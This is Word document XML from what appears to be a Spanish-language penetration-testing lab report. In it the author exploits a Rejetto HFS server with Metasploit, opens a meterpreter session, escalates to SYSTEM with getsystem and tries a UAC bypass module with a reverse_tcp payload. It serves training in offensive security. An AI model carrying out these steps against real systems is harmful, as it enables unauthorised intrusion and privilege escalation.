    </w:p>
    <w:p w14:paraId="5DDC8B56" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="036193B6" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4868DA5F" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6063CE6C" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5336AFA4" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A188F6" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E81062" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A358DBA" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F23BC1" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5C831D" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63880A08" w14:textId="2BA6F468" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EFAFE1E" wp14:editId="472E6917">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="209760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9165" name=""/>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C0EDC60" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117F11D0" w14:textId="39C5804E" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora buscare el exploit con las palabras search rejetto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C96C04" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12849DBA" w14:textId="37B88B2E" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DC04126" wp14:editId="7C14B449">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="90628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82641" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId194"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028044DF" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370A44EC" w14:textId="4B6A780F" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora pasaremos a configurarlo</w:t>
      </w:r>
      <w:r w:rsidR="0017427C">
        <w:t xml:space="preserve"> e iniciarlo</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AE1EBE" w14:textId="77777777" w:rsidR="0017427C" w:rsidRDefault="0017427C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C82791" w14:textId="77777777" w:rsidR="0017427C" w:rsidRDefault="0017427C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68272D4E" w14:textId="72B43EDC" w:rsidR="0017427C" w:rsidRDefault="0017427C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07DC7B48" wp14:editId="05505F1B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1816944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4202039E" w14:textId="7A46DF27" w:rsidR="0017427C" w:rsidRDefault="0017427C">
                            <w:r>
                              <w:t>set rhost -&gt; Configuro la IP de la máquina que vamos atacar.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3214186E" w14:textId="243E04B2" w:rsidR="0017427C" w:rsidRDefault="0017427C">
                            <w:r>
                              <w:t>set rport -&gt; Configuro el puerto donde corre el servicio en la máquina que vamos atacar.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0C6FDE94" w14:textId="3F97239D" w:rsidR="0017427C" w:rsidRDefault="0017427C">
                            <w:r>
                              <w:t>run -&gt; ejecuto el explo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DC7B48" id="_x0000_s1053" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517196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&#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AN68cu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4202039E" w14:textId="7A46DF27" w:rsidR="0017427C" w:rsidRDefault="0017427C">
                      <w:r>
                        <w:t>set rhost -&gt; Configuro la IP de la máquina que vamos atacar.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3214186E" w14:textId="243E04B2" w:rsidR="0017427C" w:rsidRDefault="0017427C">
                      <w:r>
                        <w:t>set rport -&gt; Configuro el puerto donde corre el servicio en la máquina que vamos atacar.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0C6FDE94" w14:textId="3F97239D" w:rsidR="0017427C" w:rsidRDefault="0017427C">
                      <w:r>
                        <w:t>run -&gt; ejecuto el exploit.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="774243A5" w14:textId="3730FB5A" w:rsidR="0017427C" w:rsidRDefault="00E42799" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D278A1A" wp14:editId="34E4523B">
            <wp:extent cx="5400040" cy="4615815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1170444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44994" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId195" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="4615815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="466CFB57" w14:textId="77777777" w:rsidR="0017427C" w:rsidRDefault="0017427C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A7C1229" w14:textId="04396F8A" w:rsidR="00AA0676" w:rsidRDefault="0017427C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Creando una sesión de meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E2566" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6768AF98" w14:textId="4A4FEE46" w:rsidR="00AA0676" w:rsidRDefault="00CD5FE2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora ejecutaré getuid, para ver con que usuario estoy, después ejecutaré getprivs para ver sus privilegios, por último ejecutare una </w:t>
      </w:r>
      <w:r w:rsidR="00E42799">
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>, y usare net user Alesander para ver a que grupo pertenece:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541B06C4" w14:textId="66E344D3" w:rsidR="00CD5FE2" w:rsidRDefault="00E42799" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37D43123" wp14:editId="5B02955A">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="734253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53940" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId196"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69277EC5" w14:textId="77777777" w:rsidR="00E42799" w:rsidRDefault="00E42799" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297FB129" w14:textId="0341E215" w:rsidR="00E42799" w:rsidRDefault="00E42799" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Además de conectarnos al equipo escalamos a usuario administrador, pues este programa se ejecuta como Administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0AC94A" w14:textId="77777777" w:rsidR="00CD5FE2" w:rsidRDefault="00CD5FE2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A7CBEB0" w14:textId="4A5CAEBD" w:rsidR="00CD5FE2" w:rsidRDefault="00D92F92" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60A87827" wp14:editId="2A24245A">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="503833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33197" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId197"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7D4FE54" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605BC146" w14:textId="3ADFA5B1" w:rsidR="00AA0676" w:rsidRDefault="00CD5FE2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Descubriendo que pertenece al grupo de los Administradores locales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188DCCFE" w14:textId="77777777" w:rsidR="004542FD" w:rsidRDefault="004542FD" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32CDBFC8" w14:textId="39024666" w:rsidR="004542FD" w:rsidRDefault="004542FD" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>En esta situación podemos impersonar al usuario Administrador con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> y así concederle el token de SYSTEM. Dejamos la sesión Meterpreter en segundo plano (background) y comprobamos que en la misma sesión el usuario ahora es </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> y no el Administrador que teníamos al principio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4647DCDD" w14:textId="77777777" w:rsidR="004542FD" w:rsidRDefault="004542FD" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B362AC7" w14:textId="4E4033FE" w:rsidR="004542FD" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10177DB4" wp14:editId="10EA27DA">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="261967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67935" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId198"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09AA053" w14:textId="77777777" w:rsidR="00AA0580" w:rsidRDefault="00AA0580" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CBC4B07" w14:textId="4041E66D" w:rsidR="00AA0580" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Consiguiendo su objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB03E2F" w14:textId="77777777" w:rsidR="001F1550" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4161F6F9" w14:textId="00600922" w:rsidR="001F1550" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Comprobando como ahora somos System:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268CD695" w14:textId="77777777" w:rsidR="001F1550" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1622B2D3" w14:textId="7E723C57" w:rsidR="001F1550" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F81D069" wp14:editId="4AF78D25">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="315313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3222" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId199"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1E773D8" w14:textId="77777777" w:rsidR="001F1550" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC669BC" w14:textId="34E8FC54" w:rsidR="001F1550" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dejaremos la sesión en background, y comprobaremos como ahora somos </w:t>
      </w:r>
      <w:r w:rsidR="00E25D51">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>ystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778E23E2" w14:textId="77777777" w:rsidR="001F1550" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B5EFC6" w14:textId="1467B3A6" w:rsidR="001F1550" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69639802" wp14:editId="381C876E">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="763246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6900" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId200"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5A5141B" w14:textId="77777777" w:rsidR="001F1550" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486627FE" w14:textId="3FC686F7" w:rsidR="001F1550" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Otro método:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F48C3D0" w14:textId="77777777" w:rsidR="001F1550" w:rsidRDefault="001F1550" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC02A71" w14:textId="00DB4A12" w:rsidR="00AA0580" w:rsidRDefault="00AA0580" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Para la escalada de privilegios usaremos un </w:t>
      </w:r>
      <w:r w:rsidRPr="00C815D2">
        <w:t>bypass de UAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Mediante el uso del editor de certificados de confianza se generará un proceso con el flag del UAC desactivado consiguiendo así un contexto de integridad alto. Esto dependerá de que tipo de sistema operativo Windows se trate, no es lo mismo un Windows 7/8/8.1/10 ya que los casos de byspass de UAC fileless dependerá de la existencia de los binarios en según qué versiones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3B5F94" w14:textId="77777777" w:rsidR="00AA0580" w:rsidRDefault="00AA0580" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E4B8414" w14:textId="5FFDFFEA" w:rsidR="00AA0580" w:rsidRDefault="00AA0580" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Salimos de la sesión dejándola en background. Usamos el módulo "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exploit/windows/local/bypassuac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"  el cual hará un bypass UAC fileless (que afecta al "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>editor de certificados de confianza"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">) y establecemos los parámetros del host local </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(nuestra máquina Kali), la sesión meterpreter, el payload (código que se va ejecutar) será un meterpreter reverse_tcp y lanzamos el exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D062EC" w14:textId="77777777" w:rsidR="00AA0580" w:rsidRDefault="00AA0580" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B566A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C153712" w14:textId="7A495858" w:rsidR="00AA0580" w:rsidRDefault="007A5F52" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ACF2ADE" wp14:editId="25ED83D7">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2065232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2900" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId201"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86424BC" w14:textId="77777777" w:rsidR="00AA0580" w:rsidRDefault="00AA0580" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8FF0EF" w14:textId="4788280C" w:rsidR="00C815D2" w:rsidRDefault="007A5F52" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aunque hice otra sesión para no ser </w:t>
      </w:r>
      <w:r w:rsidR="00E25D51">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ystem, no me deja la escalada </w:t>
      </w:r>
      <w:r w:rsidR="001F5D84">
        <w:t>porque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ya soy Administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8A53C7" w14:textId="77777777" w:rsidR="007A5F52" w:rsidRDefault="007A5F52" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3332FB61" w14:textId="62E7114A" w:rsidR="000D799C" w:rsidRDefault="000D799C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Vuelvo a la sesión 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710C1600" w14:textId="5F019C4E" w:rsidR="000D799C" w:rsidRDefault="000D799C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BD64190" wp14:editId="32CDB9E7">
            <wp:extent cx="5400040" cy="1433195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="173978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967" name=""/>
